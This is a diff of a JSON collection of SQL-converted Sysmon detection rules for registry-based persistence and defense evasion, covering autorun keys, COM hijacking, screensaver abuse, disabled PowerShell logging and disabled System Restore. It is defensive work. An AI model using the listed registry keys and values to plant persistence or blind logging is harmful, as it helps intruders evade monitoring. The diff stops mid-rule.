@@ -31183,1374 +31154,1449 @@ ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Winlogon\\\\VmApplet%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Userinit%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Taskman%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Shell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\GpExtensions%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\AppSetup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\AlternateShells\\\\AvailableShells%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\IconServiceLib%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Appinit\\_Dlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Image File Execution Options%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Font Drivers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Drivers32%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Run%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Load%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR (TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\DisableExceptionChainValidation' ESCAPE '\\' OR TargetObject LIKE '%\\\\MitigationOptions' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\ClickToRunStore\\\\HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft 
Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Winlogon\\\\GPExtensions\\\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\\\PreviousPolicyAreas%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\GPExtensions\\\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\\\MaxNoGPOListChangesInterval%' ESCAPE '\\') AND Details IN ('DWORD (0x00000009)', 'DWORD (0x000003c0)')) OR (Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND Image LIKE '%\\\\ngen.exe' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\StandaloneUpdater\\\\OneDriveSetup.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Delete Cached Update Binary' ESCAPE '\\' AND Details LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c del /q \"C:\\\\Users\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe\"' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows CE Services\\\\AutoStart%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Command Processor\\\\Autorun%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnDisconnect%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnConnect%' 
ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\Setup\\\\CmdLine%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Ctf\\\\LangBarAddin%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Command Processor\\\\Autorun%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Protocols\\\\Handler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Protocols\\\\Filter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Htmlfile\\\\Shell\\\\Open\\\\Command\\\\(Default)%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Environment\\\\UserInitMprLogonScript%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\Control Panel\\\\Desktop\\\\Scrnsave.exe%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\UrlSearchHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Desktop\\\\Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Classes\\\\Clsid\\\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\\\Inprocserver32%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\Scrnsave.exe%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR ((TargetObject LIKE '%\\\\Office\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Classes\\\\PROTOCOLS\\\\Handler\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ClickToRunStore\\\\HKMU\\\\SOFTWARE\\\\Classes\\\\PROTOCOLS\\\\Handler\\\\%' ESCAPE '\\') OR Details IN ('{314111c7-a502-11d2-bbca-00c04f8ec294}', '{3459B272-CC19-4448-86C9-DDC3B4B2FAD3}', '{42089D2D-912D-4018-9087-2B87803E93FB}', '{5504BE45-A83B-4808-900A-3A5C36E7F77A}', '{807583E5-5146-11D5-A672-00B0D022E945}')) OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{8A69D345-D564-463c-AFF1-A69D9E530F96}%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active 
Setup\\\\Installed Components\\\\{9459C573-B17A-45AE-9F64-1857B5D58CEE}%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{89820200-ECBD-11cf-8B85-00AA005B4383}%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" ], - "filename": "registry_set_asep_reg_keys_modification_currentversion_nt.yml" + "filename": "registry_set_asep_reg_keys_modification_common.yml" }, { - "title": "Registry Hide Function from User", - "id": "5a93eb65-dffa-4543-b761-94aa60098fb6", - "status": "test", - "description": "Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)", - "author": "frack113", + "title": "Potential Persistence Via COM Search Order Hijacking", + "id": "a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12", + "status": "experimental", + "description": "Detects potential COM object hijacking leveraging the COM Search Order", + "author": "Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Legitimate admin script" + "Some installed utilities (i.e. 
OneDrive) may serve new COM objects at user-level" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideClock' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAHealth' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCANetwork' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAPower' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAVolume' ESCAPE '\\') AND Details = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowInfoTip' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowCompColor' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\') AND NOT (((Details LIKE '%\\%\\%systemroot\\%\\%\\\\system32\\\\%' ESCAPE '\\' OR Details LIKE '%\\%\\%systemroot\\%\\%\\\\SysWow64\\\\%' ESCAPE '\\')) OR ((Details LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\FileCoAuthLib64.dll%' ESCAPE '\\' OR Details LIKE '%\\\\FileSyncShell64.dll%' ESCAPE '\\' OR Details LIKE '%\\\\FileSyncApi64.dll%' ESCAPE '\\')) OR (Image LIKE 
'C:\\\\WINDOWS\\\\system32\\\\SecurityHealthService.exe' ESCAPE '\\') OR (Details LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\TeamsMeetingAddin\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\Microsoft.Teams.AddinLoader.dll%' ESCAPE '\\') OR (Details LIKE '%\\\\AppData\\\\Roaming\\\\Dropbox\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\DropboxExt64.%.dll%' ESCAPE '\\') OR (Details LIKE '%TmopIEPlg.dll' ESCAPE '\\') OR ((Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wuauclt.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (Details LIKE '%\\\\FileRepository\\\\nvmdi.inf%' ESCAPE '\\') OR (Image LIKE '%\\\\MicrosoftEdgeUpdateComRegisterShell64.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\SYSTEM32\\\\dxdiag.exe' ESCAPE '\\') OR ((Details LIKE 'C:\\\\Windows\\\\pyshellext.amd64.dll' ESCAPE '\\' OR Details LIKE 'C:\\\\Windows\\\\pyshellext.dll' ESCAPE '\\')) OR ((Details LIKE 'C:\\\\Windows\\\\system32\\\\dnssdX.dll' ESCAPE '\\' OR Details LIKE 'C:\\\\Windows\\\\SysWOW64\\\\dnssdX.dll' ESCAPE '\\')) OR (Details LIKE 'C:\\\\Windows\\\\system32\\\\spool\\\\drivers\\\\x64\\\\3\\\\PrintConfig.dll' ESCAPE '\\') OR ((Details LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (Details LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\%' ESCAPE '\\') OR (Details LIKE '%C:\\\\WINDOWS\\\\system32\\\\GamingServicesProxy.dll%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND Details LIKE '%C:\\\\Windows\\\\System32\\\\Autopilot.dll%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\SecurityHealthService.exe' ESCAPE '\\' AND Details LIKE '%C:\\\\Windows\\\\System32\\\\SecurityHealth%' ESCAPE '\\') OR ((Image LIKE 
'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\regsvr32.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\InProcServer32\\\\(Default)' ESCAPE '\\')))" ], - "filename": "registry_set_hide_function_user.yml" + "filename": "registry_set_persistence_search_order.yml" }, { - "title": "Potential Persistence Using DebugPath", - "id": "df4dc653-1029-47ba-8231-3c44238cc0ae", + "title": "ScreenSaver Registry Key Set", + "id": "40b6e656-4e11-4c0c-8772-c1cc6dae34ce", "status": "experimental", - "description": "Detects potential persistence using Appx DebugPath", - "author": "frack113", + "description": "Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl", + "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", "tags": [ - "attack.persistence", - "attack.t1546.015" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "Legitimate use of screen saver" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ActivatableClasses\\\\Package\\\\Microsoft.%' ESCAPE '\\' AND TargetObject LIKE '%\\\\DebugPath' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\PackagedAppXDebug\\\\Microsoft.%' ESCAPE '\\' AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\SCRNSAVE.EXE%' ESCAPE '\\' AND Details LIKE '%.scr' ESCAPE '\\') AND NOT ((Details LIKE '%C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_appx_debugger.yml" + 
"filename": "registry_set_scr_file_executed_by_rundll32.yml" }, { - "title": "Change User Account Associated with the FAX Service", - "id": "e3fdf743-f05b-4051-990a-b66919be1743", + "title": "PowerShell Logging Disabled Via Registry Key Tampering", + "id": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", "status": "experimental", - "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", + "description": "Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\Fax\\\\ObjectName' ESCAPE '\\' AND NOT (Details LIKE '%NetworkService%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\PowerShell\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\PowerShellCore\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\ModuleLogging\\\\EnableModuleLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockInvocationLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableTranscripting' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableInvocationHeader' ESCAPE '\\' OR TargetObject LIKE '%\\\\EnableScripts' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" ], - "filename": "registry_set_fax_change_service_user.yml" + "filename": "registry_set_powershell_logging_disabled.yml" }, { - "title": "Disable 
Windows Security Center Notifications", - "id": "3ae1a046-f7db-439d-b7ce-b8b366b81fa6", + "title": "Allow RDP Remote Assistance Feature", + "id": "37b437cf-3fc5-4c8e-9c94-1d7c9aff842b", "status": "experimental", - "description": "Detect set UseActionCenterExperience to 0 to disable the windows security center notification", + "description": "Detect enable rdp feature to allow specific user to rdp connect on the targeted machine", "author": "frack113", "tags": [ "attack.defense_evasion", "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate use of the feature (alerts should be investigated either way)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%Windows\\\\CurrentVersion\\\\ImmersiveShell\\\\UseActionCenterExperience' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\fAllowToGetHelp' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "registry_set_disable_security_center_notifications.yml" + "filename": "registry_set_allow_rdp_remote_assistance_feature.yml" }, { - "title": "Enable Microsoft Dynamic Data Exchange", - "id": "63647769-326d-4dde-a419-b925cc0caf42", - "status": "test", - "description": "Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.", + "title": "Potential Persistence Using DebugPath", + "id": "df4dc653-1029-47ba-8231-3c44238cc0ae", + "status": "experimental", + "description": "Detects potential persistence using Appx DebugPath", "author": "frack113", "tags": [ - "attack.execution", - "attack.t1559.002" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE 
((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\Word\\\\Security\\\\AllowDDE' ESCAPE '\\' AND Details IN ('DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Excel\\\\Security\\\\DisableDDEServerLaunch' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Security\\\\DisableDDEServerLookup' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ActivatableClasses\\\\Package\\\\Microsoft.%' ESCAPE '\\' AND TargetObject LIKE '%\\\\DebugPath' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\PackagedAppXDebug\\\\Microsoft.%' ESCAPE '\\' AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\')))" ], - "filename": "registry_set_office_enable_dde.yml" + "filename": "registry_set_persistence_appx_debugger.yml" }, { - "title": "Potential Persistence Via COM Hijacking From Suspicious Locations", - "id": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", + "title": "Potential Persistence Via Outlook Today Pages", + "id": "487bb375-12ef-41f6-baae-c6a1572b4dd1", "status": "experimental", - "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential persistence activity via outlook today pages. An attacker can set a custom page to execute arbitrary code and link to it via the registry key \"UserDefinedUrl\".", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1546.015" + "attack.t1112" ], "falsepositives": [ - "Probable legitimate applications. 
If you find these please add them to an exclusion list" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CLASSES\\_ROOT\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CURRENT\\_USER\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%\\\\LocalServer32\\\\(Default)' ESCAPE '\\') AND (Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%%' ESCAPE '\\' OR Details LIKE '%\\%appdata\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Today\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%Stamp' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR TargetObject LIKE '%UserDefinedUrl' ESCAPE '\\')) AND NOT (((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" ], - "filename": 
"registry_set_persistence_com_hijacking_susp_locations.yml" + "filename": "registry_set_persistence_outlook_todaypage.yml" }, { - "title": "Changing RDP Port to Non Standard Number", - "id": "509e84b9-a71a-40e0-834f-05470369bd1e", - "status": "test", - "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", + "title": "Registry Disable System Restore", + "id": "5de03871-5d46-4539-a82d-3aa992a69a83", + "status": "experimental", + "description": "Detects the modification of the registry to disable a system restore on the computer", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.010" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\PortNumber' ESCAPE '\\') AND NOT (Details = 'DWORD (0x00000d3d)'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\SystemRestore%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SystemRestore%' ESCAPE '\\') AND (TargetObject LIKE '%DisableConfig' ESCAPE '\\' OR TargetObject LIKE '%DisableSR' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" ], - "filename": "registry_set_change_rdp_port.yml" + "filename": "registry_set_disable_system_restore.yml" }, { - "title": "Common Autorun Keys Modification", - "id": "f59c3faf-50f3-464b-9f4c-1b67ab512d99", + "title": "Potential Qakbot Registry Activity", + "id": 
"1c8e96cd-2bed-487d-9de0-b46c90cade56", "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)", + "description": "Detects a registry key used by IceID in a campaign that distributes malicious OneNote files", + "author": "Hieu Tran", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows CE Services\\\\AutoStart%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Command Processor\\\\Autorun%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnDisconnect%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnConnect%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\Setup\\\\CmdLine%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Ctf\\\\LangBarAddin%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Command Processor\\\\Autorun%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Protocols\\\\Handler%' ESCAPE '\\' OR TargetObject LIKE 
